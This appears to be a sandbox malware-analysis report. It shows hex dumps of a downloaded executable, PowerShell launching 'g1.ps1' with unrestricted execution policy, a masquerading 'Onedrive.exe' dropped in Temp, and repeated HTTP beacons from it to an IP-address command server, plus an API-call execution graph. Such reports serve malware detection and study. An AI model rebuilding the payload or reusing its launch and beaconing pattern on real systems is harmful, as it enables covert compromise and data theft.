                                      2024-12-19 12:36:18 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3e 87 d9 e0 7a e6 b7 b3 7a e6 b7 b3 7a e6 b7 b3 31 9e b4 b2 7d e6 b7 b3 31 9e b2 b2 f6 e6 b7 b3 31 9e b3 b2 70 e6 b7 b3 6a 62 b4 b2 73 e6 b7 b3 6a 62 b3 b2 74 e6 b7 b3 6a 62 b2 b2 5a e6 b7 b3 31 9e b6 b2 79 e6 b7 b3 7a e6 b6 b3 12 e6 b7 b3 31 63 b3 b2 79 e6 b7 b3 31 63 b7 b2 7b e6 b7 b3 31 63 48 b3 7b e6 b7 b3 31 63 b5 b2 7b e6 b7 b3 52 69 63 68 7a e6 b7 b3 00 00 00 00 00 00 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$>zzz1}11pjbsjbtjbZ1yz1cy1c{1cH{1c{Richz
                                      2024-12-19 12:36:18 UTC16384INData Raw: 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 56 57 48 81 ec e8 00 00 00 48 8b 05 1c 34 05 00 48 33 c4 48 89 84 24 d0 00 00 00 48 8d 44 24 30 48 8d 0d 45 e6 03 00 48 8b f8 48 8b f1 b9 98 00 00 00 f3 a4 b8 08 00 00 00 48 6b c0 00 48 8d 0d 78 2a 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 01 48 8b 8c 24 18 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 02 48 8b 8c 24 20 01 00 00 48 89 4c 04 50 48 63 84 24 30 01 00 00 b9 08 00 00 00 48 6b c9 03 48 89 44 0c 50 b8 08 00 00 00 48 6b c0 04 48 8b 8c 24 10 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 05 48 8b 8c 24 28 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 06 48 8b 8c 24 08 01 00 00 48 89 4c 04 50 0f b6 84 24 50 01 00 00 b9 08 00 00 00 48 6b c9 07 48 89 44 0c 50 b8 08 00 00 00 48 6b c0
                                      Data Ascii: LL$ LD$HT$HL$VWHH4H3H$HD$0HEHHHkHx*HLPHkH$HLPHkH$ HLPHc$0HkHDPHkH$HLPHkH$(HLPHkH$HLP$PHkHDPHk
                                      2024-12-19 12:36:18 UTC16384INData Raw: 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 48 48 8d 44 24 28 48 89 44 24 20 4c 8b 44 24 60 48 8b 54 24 58 48 8b 4c 24 20 e8 5a 25 00 00 41 b1 01 44 8b 44 24 68 48 8b d0 48 8b 4c 24 50 e8 05 2a 00 00 48 83 c4 48 c3 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 81 ec 98 00 00 00 48 c7 44 24 60 fe ff ff ff 48 83 bc 24 a8 00 00 00 00 74 0a c7 44 24 30 01 00 00 00 eb 08 c7 44 24 30 00 00 00 00 8b 44 24 30 89 44 24 34 83 7c 24 34 00 75 3a 48 8d 05 d1 b0 03 00 48 89 44 24 28 48 8d 05 15 a7 03 00 48 89 44 24 20 45 33 c9 41 b8 22 00 00 00 48 8d 15 d8 b0 03 00 b9 02 00 00 00 e8 ee 62 01 00 83 f8 01 75 03 cc 33 c0 83 7c 24 34 00 75 61 48 8b 8c 24 b8 00 00 00 e8 72 7a 00 00 48 89 44 24 40 ba 16 00 00 00 48 8b 4c 24 40 e8 be
                                      Data Ascii: DL$ LD$HT$HL$HHHD$(HD$ LD$`HT$XHL$ Z%ADD$hHHL$P*HHLL$ LD$HT$HL$HHD$`H$tD$0D$0D$0D$4|$4u:HHD$(HHD$ E3A"Hbu3|$4uaH$rzHD$@HL$@
                                      2024-12-19 12:36:18 UTC16384INData Raw: 24 38 48 8b 8c 24 90 00 00 00 e8 91 e2 ff ff 88 44 24 33 eb 16 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 a9 e2 ff ff 88 44 24 33 0f b6 44 24 33 88 44 24 30 e9 23 01 00 00 ba 10 00 00 00 48 8b 8c 24 90 00 00 00 e8 a5 3b 00 00 0f b6 c0 85 c0 74 18 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 9c e2 ff ff 88 44 24 34 eb 16 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 84 e2 ff ff 88 44 24 34 0f b6 44 24 34 88 44 24 30 e9 ce 00 00 00 33 c0 85 c0 74 0a c7 44 24 40 01 00 00 00 eb 08 c7 44 24 40 00 00 00 00 8b 44 24 40 89 44 24 44 83 7c 24 44 00 75 3a 48 8d 05 54 7c 03 00 48 89 44 24 28 48 8d 05 00 67 03 00 48 89 44 24 20 45 33 c9 41 b8 0b 0a 00 00 48 8d 15 f3 72 03 00 b9 02 00 00 00 e8 d9 22 01 00 83 f8 01 75 03 cc 33 c0 83 7c 24 44 00 75 66 48 8b 84 24 90 00 00 00 48
                                      Data Ascii: $8H$D$3HT$8H$D$3D$3D$0#H$;tHT$8H$D$4HT$8H$D$4D$4D$03tD$@D$@D$@D$D|$Du:HT|HD$(HgHD$ E3AHr"u3|$DufH$H
                                      2024-12-19 12:36:18 UTC16384INData Raw: 03 cc 33 c0 83 7c 24 38 00 75 63 48 8b 44 24 70 48 8b 48 08 e8 47 fb ff ff 48 89 44 24 50 ba 16 00 00 00 48 8b 4c 24 50 e8 93 0a 00 00 48 8b 44 24 70 48 8b 40 08 48 89 44 24 28 48 c7 44 24 20 00 00 00 00 41 b9 84 06 00 00 4c 8d 05 7f 33 03 00 48 8d 15 38 34 03 00 48 8d 0d 39 33 03 00 e8 cc d1 00 00 b8 ff ff ff ff e9 7f 02 00 00 48 8b 4c 24 70 e8 28 f4 ff ff 0f b6 c0 85 c0 0f 84 62 02 00 00 48 8b 44 24 70 c7 40 48 00 00 00 00 48 8b 44 24 70 c6 40 24 00 48 8b 44 24 70 48 8b 40 10 0f b6 00 88 44 24 31 48 8b 44 24 70 48 8b 40 10 48 ff c0 48 8b 4c 24 70 48 89 41 10 48 8b 44 24 70 0f b6 4c 24 31 88 48 39 0f be 44 24 31 85 c0 0f 84 f1 01 00 00 48 8b 44 24 70 83 78 20 00 0f 8c e2 01 00 00 48 8b 44 24 70 44 0f b6 40 24 48 8b 44 24 70 0f b6 50 39 48 8b 4c 24 70 e8
                                      Data Ascii: 3|$8ucHD$pHHGHD$PHL$PHD$pH@HD$(HD$ AL3H84H93HL$p(bHD$p@HHD$p@$HD$pH@D$1HD$pH@HHL$pHAHD$pL$1H9D$1HD$px HD$pD@$HD$pP9HL$p
                                      2024-12-19 12:36:18 UTC16384INData Raw: 8b 84 24 d0 00 00 00 48 8b 40 40 0f be 00 83 f8 49 74 28 48 8b 84 24 d0 00 00 00 48 8b 40 40 0f be 00 83 f8 6e 74 14 48 8b 84 24 d0 00 00 00 48 8b 40 40 0f be 00 83 f8 4e 75 23 ba 08 00 00 00 48 8b 8c 24 d0 00 00 00 e8 b3 12 00 00 b8 73 00 00 00 48 8b 8c 24 d0 00 00 00 66 89 41 3a 48 8b 84 24 d0 00 00 00 48 8b 48 40 e8 c1 8c 00 00 48 8b 8c 24 d0 00 00 00 89 41 48 b0 01 48 81 c4 c0 00 00 00 5f c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 33 d2 48 8b 4c 24 30 e8 2b 00 00 00 48 83 c4 28 c3 cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 33 d2 48 8b 4c 24 30 e8 7b 01 00 00 48 83 c4 28 c3 cc cc cc cc cc cc 88 54 24 10 48 89 4c 24 08 48 83 ec 68 48 8b 44 24 70 44 8b 40 34 48 8b 44 24 70 0f b6 50 39 48 8b 44 24 70 48 8b 08 e8 24 63 ff ff 0f b6 c0
                                      Data Ascii: $H@@It(H$H@@ntH$H@@Nu#H$sH$fA:H$HH@H$AHH_HL$H(3HL$0+H(HL$H(3HL$0{H(T$HL$HhHD$pD@4HD$pP9HD$pH$c
                                      2024-12-19 12:36:18 UTC16384INData Raw: 24 34 48 8b 44 24 28 48 ff c0 48 89 44 24 28 0f b6 44 24 34 88 44 24 21 e9 ba 00 00 00 48 8b 84 24 80 00 00 00 48 8b 00 48 ff c0 48 8b 8c 24 80 00 00 00 48 89 01 48 83 7c 24 70 00 74 1c 48 8b 44 24 70 48 8b 4c 24 28 0f b6 09 88 08 48 8b 44 24 70 48 ff c0 48 89 44 24 70 48 8b 44 24 28 0f b6 00 88 44 24 35 48 8b 44 24 28 48 ff c0 48 89 44 24 28 0f b6 44 24 35 88 44 24 21 0f b6 4c 24 21 e8 9a 04 00 00 0f b6 c0 85 c0 74 4a 48 8b 84 24 80 00 00 00 48 8b 00 48 ff c0 48 8b 8c 24 80 00 00 00 48 89 01 48 83 7c 24 70 00 74 1c 48 8b 44 24 70 48 8b 4c 24 28 0f b6 09 88 08 48 8b 44 24 70 48 ff c0 48 89 44 24 70 48 8b 44 24 28 48 ff c0 48 89 44 24 28 0f be 44 24 21 85 c0 74 25 0f b6 44 24 20 85 c0 0f 85 d8 fe ff ff 0f be 44 24 21 83 f8 20 74 0e 0f be 44 24 21 83 f8 09
                                      Data Ascii: $4HD$(HHD$(D$4D$!H$HHH$HH|$ptHD$pHL$(HD$pHHD$pHD$(D$5HD$(HHD$(D$5D$!L$!tJH$HHH$HH|$ptHD$pHL$(HD$pHHD$pHD$(HHD$(D$!t%D$ D$! tD$!
                                      2024-12-19 12:36:18 UTC16384INData Raw: 48 89 4c 24 08 48 83 ec 38 33 c9 e8 10 9a 00 00 90 48 8b 4c 24 40 e8 d5 dc ff ff 90 33 c9 e8 8d 9a 00 00 48 8d 05 a6 b2 02 00 48 89 44 24 28 48 8d 05 f2 65 02 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 f6 22 00 00 83 f8 01 75 03 cc 33 c0 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 58 c7 44 24 40 37 00 00 00 8b 44 24 60 25 ff ff 00 00 83 e0 c8 85 c0 75 07 c6 44 24 30 01 eb 05 c6 44 24 30 00 0f b6 44 24 30 88 44 24 31 83 7c 24 60 ff 74 13 0f b6 44 24 31 85 c0 75 0a c7 44 24 34 00 00 00 00 eb 08 c7 44 24 34 01 00 00 00 8b 44 24 34 89 44 24 38 83 7c 24 38 00 75 3a 48 8d 05 73 af 02 00 48 89 44 24 28 48 8d 05 ef 66 02 00 48 89 44 24 20 45 33 c9 41 b8 29 05 00 00 48 8d 15 f2 a2 02 00 b9 02 00 00 00 e8 c8 22 00 00 83 f8 01 75 03 cc 33
                                      Data Ascii: HL$H83HL$@3HHD$(HeHD$ E3E333"u3H8L$HXD$@7D$`%uD$0D$0D$0D$1|$`tD$1uD$4D$4D$4D$8|$8u:HsHD$(HfHD$ E3A)H"u3
                                      2024-12-19 12:36:19 UTC16384INData Raw: 5c ec 00 00 89 44 24 28 8b 44 24 28 39 44 24 20 74 16 ba 10 00 00 00 48 8d 4c 24 30 e8 4f fe ff ff b8 ff ff ff ff eb 27 ba 04 00 00 00 48 8d 4c 24 30 e8 59 fd ff ff 0f b6 c0 85 c0 74 0f ba 02 00 00 00 48 8d 4c 24 30 e8 93 fe ff ff 33 c0 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 78 33 d2 48 8d 4c 24 30 e8 6b ee fe ff 48 8d 54 24 30 48 8b 8c 24 80 00 00 00 e8 89 fb ff ff 89 44 24 20 48 8d 4c 24 30 e8 ab f0 fe ff 8b 44 24 20 48 83 c4 78 c3 cc cc 48 83 ec 28 b1 01 e8 05 fc ff ff 48 83 c4 28 c3 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 e8 a9 fa fe ff 23 44 24 48 85 c0 74 0a c7 44 24 20 01 00 00 00 eb 08 c7 44 24 20 00 00 00 00 0f b6 44 24 20 48 83 c4 38 c3 cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 ba 40 00 00 00 48
                                      Data Ascii: \D$(D$(9D$ tHL$0O'HL$0YtHL$03HXHL$Hx3HL$0kHT$0H$D$ HL$0D$ HxH(H(T$HL$H8HL$@#D$HtD$ D$ D$ H8HL$H(@H
                                      2024-12-19 12:36:19 UTC16384INData Raw: c8 00 00 00 e8 07 f1 00 00 89 44 24 4c 48 83 bc 24 c0 00 00 00 00 74 0e 48 8b 84 24 c0 00 00 00 8b 4c 24 4c 89 08 83 7c 24 4c 04 7f 09 33 c0 e9 8d 03 00 00 eb 29 48 8b 8c 24 e0 00 00 00 e8 1d bb fe ff 48 89 84 24 80 00 00 00 33 d2 48 8b 8c 24 80 00 00 00 e8 e6 fd ff ff e9 62 03 00 00 48 8b 44 24 68 48 8b 00 b9 08 00 00 00 48 6b c9 02 48 83 bc 08 28 01 00 00 00 0f 85 82 01 00 00 0f b7 84 24 d8 00 00 00 3d ff 00 00 00 7e 59 48 83 bc 24 c8 00 00 00 00 74 22 48 83 bc 24 d0 00 00 00 00 76 17 4c 8b 84 24 d0 00 00 00 33 d2 48 8b 8c 24 c8 00 00 00 e8 45 b5 01 00 48 8b 8c 24 e0 00 00 00 e8 98 ba fe ff 48 89 84 24 88 00 00 00 ba 2a 00 00 00 48 8b 8c 24 88 00 00 00 e8 de c9 fe ff e9 da 02 00 00 48 83 bc 24 c8 00 00 00 00 0f 84 e6 00 00 00 48 83 bc 24 d0 00 00 00 00
                                      Data Ascii: D$LH$tH$L$L|$L3)H$H$3H$bHD$hHHkH($=~YH$t"H$vL$3H$EH$H$*H$H$H$


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.54970947.84.196.1484435036C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-19 12:36:21 UTC179OUTPOST /reports HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Content-Type: */*
                                      User-Agent: Mozilla/5.0
                                      Content-Length: 282
                                      Host: 47.84.196.148
                                      2024-12-19 12:36:21 UTC282OUTData Raw: 00 00 01 16 de ad be ef 7d de 40 04 00 00 00 63 00 00 00 00 26 16 ca 0a 18 0c f0 10 94 ea 7e 5e 92 66 ac 76 50 e4 9c da 62 5c 68 ca e4 2e 70 d8 fa 8c 36 62 36 7c 2e 12 8a c0 24 96 96 a4 7e 66 4e 26 2c 1c 78 7d 79 41 c2 62 58 ce 50 8a 15 43 4f 7c 6b 10 3c 10 ea 8b b6 be 3f 8c 83 d0 4d 09 2c 55 f4 e5 6f c7 d7 35 25 fd 49 57 f6 f0 87 70 7e 72 89 d1 ea 1a 93 f3 58 4d fa f7 e8 85 ff df be 75 82 2a b0 43 8d 1f ba fb b5 1e a4 01 23 94 71 00 4a f1 fe f5 48 40 5a 38 9c 0f 56 da a3 a0 0a 09 1c 66 a6 57 59 02 bf 20 d7 3a fc 34 19 c4 43 74 9b 47 9a 3d c0 06 c3 37 6c d2 5b 48 81 5e 00 39 0b eb bc 3b ea 38 77 2e 28 81 20 cc 5d e1 d7 46 e9 b9 57 9e 56 76 96 05 1b b2 3c f9 2d 6c 2c d0 b8 59 1e d3 e3 85 33 96 a0 49 95 37 ba f1 97 b1 3d 44 5f d4 d2 4a 5d c5 33 84 14 ee bb
                                      Data Ascii: }@c&~^fvPb\h.p6b6|.$~fN&,x}yAbXPCO|k<?M,Uo5%IWp~rXMu*C#qJH@Z8VfWY :4CtG=7l[H^9;8w.( ]FWVv<-l,Y3I7=D_J]3
                                      2024-12-19 12:36:22 UTC166INHTTP/1.1 200 OK
                                      Date: Thu, 19 Dec 2024 12:36:22 GMT
                                      Server: Apache/2.4.58 (Ubuntu)
                                      Content-Length: 4
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      2024-12-19 12:36:22 UTC4INData Raw: 01 e3 e7 38
                                      Data Ascii: 8


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.54978547.84.196.1484435036C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-19 12:36:53 UTC178OUTPOST /reports HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Content-Type: */*
                                      User-Agent: Mozilla/5.0
                                      Content-Length: 20
                                      Host: 47.84.196.148
                                      2024-12-19 12:36:53 UTC20OUTData Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00
                                      Data Ascii: }@
                                      2024-12-19 12:36:54 UTC167INHTTP/1.1 200 OK
                                      Date: Thu, 19 Dec 2024 12:36:54 GMT
                                      Server: Apache/2.4.58 (Ubuntu)
                                      Content-Length: 12
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      2024-12-19 12:36:54 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.54987947.84.196.1484435036C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-19 12:37:33 UTC178OUTPOST /reports HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Content-Type: */*
                                      User-Agent: Mozilla/5.0
                                      Content-Length: 20
                                      Host: 47.84.196.148
                                      2024-12-19 12:37:33 UTC20OUTData Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00
                                      Data Ascii: }@
                                      2024-12-19 12:37:34 UTC167INHTTP/1.1 200 OK
                                      Date: Thu, 19 Dec 2024 12:37:33 GMT
                                      Server: Apache/2.4.58 (Ubuntu)
                                      Content-Length: 12
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      2024-12-19 12:37:34 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.54996547.84.196.1484435036C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-19 12:38:11 UTC178OUTPOST /reports HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Content-Type: */*
                                      User-Agent: Mozilla/5.0
                                      Content-Length: 20
                                      Host: 47.84.196.148
                                      2024-12-19 12:38:11 UTC20OUTData Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00
                                      Data Ascii: }@
                                      2024-12-19 12:38:12 UTC167INHTTP/1.1 200 OK
                                      Date: Thu, 19 Dec 2024 12:38:12 GMT
                                      Server: Apache/2.4.58 (Ubuntu)
                                      Content-Length: 12
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      2024-12-19 12:38:12 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.54998347.84.196.1484435036C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-19 12:38:43 UTC178OUTPOST /reports HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Content-Type: */*
                                      User-Agent: Mozilla/5.0
                                      Content-Length: 20
                                      Host: 47.84.196.148
                                      2024-12-19 12:38:43 UTC20OUTData Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00
                                      Data Ascii: }@
                                      2024-12-19 12:38:44 UTC167INHTTP/1.1 200 OK
                                      Date: Thu, 19 Dec 2024 12:38:44 GMT
                                      Server: Apache/2.4.58 (Ubuntu)
                                      Content-Length: 12
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      2024-12-19 12:38:44 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.54998447.84.196.1484435036C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-19 12:39:22 UTC178OUTPOST /reports HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Content-Type: */*
                                      User-Agent: Mozilla/5.0
                                      Content-Length: 20
                                      Host: 47.84.196.148
                                      2024-12-19 12:39:22 UTC20OUTData Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00
                                      Data Ascii: }@
                                      2024-12-19 12:39:23 UTC167INHTTP/1.1 200 OK
                                      Date: Thu, 19 Dec 2024 12:39:23 GMT
                                      Server: Apache/2.4.58 (Ubuntu)
                                      Content-Length: 12
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      2024-12-19 12:39:23 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.54998547.84.196.1484435036C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-19 12:39:52 UTC178OUTPOST /reports HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Content-Type: */*
                                      User-Agent: Mozilla/5.0
                                      Content-Length: 20
                                      Host: 47.84.196.148
                                      2024-12-19 12:39:52 UTC20OUTData Raw: 00 00 00 10 de ad be ef 7d de 40 04 00 00 00 01 00 00 00 00
                                      Data Ascii: }@
                                      2024-12-19 12:39:53 UTC167INHTTP/1.1 200 OK
                                      Date: Thu, 19 Dec 2024 12:39:53 GMT
                                      Server: Apache/2.4.58 (Ubuntu)
                                      Content-Length: 12
                                      Content-Type: application/octet-stream
                                      Connection: close
                                      2024-12-19 12:39:53 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii:


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:07:36:06
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1"
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:1
                                      Start time:07:36:06
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:07:36:18
                                      Start date:19/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Onedrive.exe"
                                      Imagebase:0x7ff6104f0000
                                      File size:110'536 bytes
                                      MD5 hash:32C31F06E0B68F349F68AFDD08E45F3D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:low
                                      Has exited:false

                                      Reset < >
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2268991849.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
                                        • Instruction ID: 4f6d13a1e641f644b83a0d5b89e1e045fb9419d8f6b4001dfd04de57bab85d14
                                        • Opcode Fuzzy Hash: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
                                        • Instruction Fuzzy Hash: FF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661D736E882CB45

                                        Execution Graph

                                        Execution Coverage:1.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:47.3%
                                        Total number of Nodes:188
                                        Total number of Limit Nodes:8
                                        execution_graph 28212 7ff6104fe530 GetStartupInfoW 28213 7ff6104fe56f 28212->28213 28214 7ff6104fe58a Sleep 28213->28214 28215 7ff6104fe581 28213->28215 28214->28213 28216 7ff6104fe5a6 _amsg_exit 28215->28216 28219 7ff6104fe5b4 28215->28219 28216->28219 28217 7ff6104fe62a _initterm 28220 7ff6104fe647 _IsNonwritableInCurrentImage 28217->28220 28218 7ff6104fe60b 28219->28217 28219->28218 28219->28220 28220->28218 28226 7ff6104f1384 28220->28226 28223 7ff6104fe710 28223->28218 28225 7ff6104fe719 _cexit 28223->28225 28224 7ff6104fe708 exit 28224->28223 28225->28218 28227 7ff6104f13c3 28226->28227 28285 7ff6104f9cac 28227->28285 28230 7ff6104f9cac EventRegister 28231 7ff6104f13f7 EventRegister 28230->28231 28232 7ff6104f1446 EventSetInformation 28231->28232 28233 7ff6104f1467 28231->28233 28232->28233 28234 7ff6104f149a EventActivityIdControl 28233->28234 28239 7ff6104f14c8 28233->28239 28234->28239 28235 7ff6104f1552 SLOpen 28236 7ff6104f1577 SLpIsCurrentInstalledProductKeyDefaultKey 28235->28236 28241 7ff6104f1568 28235->28241 28237 7ff6104f1591 28236->28237 28236->28241 28238 7ff6104f159c RoInitialize 28237->28238 28237->28241 28240 7ff6104f15b0 28238->28240 28238->28241 28239->28235 28288 7ff6104f1008 EventWriteTransfer 28239->28288 28244 7ff6104f15c9 CommandLineToArgvW 28240->28244 28260 7ff6104f15b5 28240->28260 28242 7ff6104f1746 EventUnregister 28241->28242 28293 7ff6104f1008 EventWriteTransfer 28241->28293 28294 7ff6104f1c50 7 API calls 28242->28294 28245 7ff6104f15e4 GetLastError 28244->28245 28246 7ff6104f1615 28244->28246 28245->28260 28289 7ff6104f18a4 9 API calls 28246->28289 28248 7ff6104f176e 28252 7ff6104f1787 28248->28252 28253 7ff6104f1777 SLClose 28248->28253 28250 7ff6104f16e3 RoUninitialize 28250->28241 28295 7ff6104f9b6c EventUnregister 28252->28295 28253->28252 28254 7ff6104f1624 28256 7ff6104f162e ChangeWindowMessageFilter 28254->28256 28254->28260 28256->28245 28258 7ff6104f1646 28256->28258 28257 7ff6104f1793 28296 7ff6104f9b6c EventUnregister 28257->28296 28290 7ff6104f7b1c 305 API calls 28258->28290 28260->28250 28262 7ff6104f1653 28264 7ff6104f16bd GetMessageW 28262->28264 28265 7ff6104f1659 28262->28265 28267 7ff6104f169d TranslateMessage DispatchMessageW 28262->28267 28291 7ff6104f7f30 23 API calls 28262->28291 28263 7ff6104f179f 28269 7ff6104f17ef 28263->28269 28270 7ff6104f17df CloseHandle 28263->28270 28264->28262 28266 7ff6104f16d9 28264->28266 28265->28260 28292 7ff6104f1c50 7 API calls 28266->28292 28267->28264 28272 7ff6104f180f 28269->28272 28273 7ff6104f17fc UnregisterWaitEx 28269->28273 28270->28269 28271 7ff6104f16e0 28271->28250 28275 7ff6104f182b 28272->28275 28276 7ff6104f1818 UnregisterWaitEx 28272->28276 28273->28272 28277 7ff6104f1844 28275->28277 28278 7ff6104f1834 CloseHandle 28275->28278 28276->28275 28279 7ff6104f185d 28277->28279 28280 7ff6104f184d CloseHandle 28277->28280 28278->28277 28281 7ff6104f1862 LocalFree 28279->28281 28282 7ff6104f1871 28279->28282 28280->28279 28281->28282 28297 7ff6104fe7d0 7 API calls __raise_securityfailure 28282->28297 28284 7ff6104f187f 28284->28223 28284->28224 28286 7ff6104f13dd 28285->28286 28287 7ff6104f9cb7 EventRegister 28285->28287 28286->28230 28287->28286 28288->28235 28289->28254 28290->28262 28291->28262 28292->28271 28293->28242 28294->28248 28295->28257 28296->28263 28297->28284 28298 7ff6104fe4e0 __wgetmainargs 28299 7ff8a03025b0 28300 7ff8a03025bf 28299->28300 28309 7ff8a0302b00 28300->28309 28305 7ff8a03025d8 28312 7ff8a0302b80 28309->28312 28311 7ff8a03025cb 28313 7ff8a0303b00 28311->28313 28325 7ff8a0303170 28312->28325 28314 7ff8a0303b09 28313->28314 28336 7ff8a0304430 28314->28336 28317 7ff8a03025d1 28317->28305 28321 7ff8a031a0a0 28317->28321 28319 7ff8a0303b1f 28319->28317 28343 7ff8a03044a0 DeleteCriticalSection 28319->28343 28346 7ff8a032a950 28321->28346 28324 7ff8a0303b70 7 API calls 2 library calls 28324->28305 28326 7ff8a0303179 28325->28326 28327 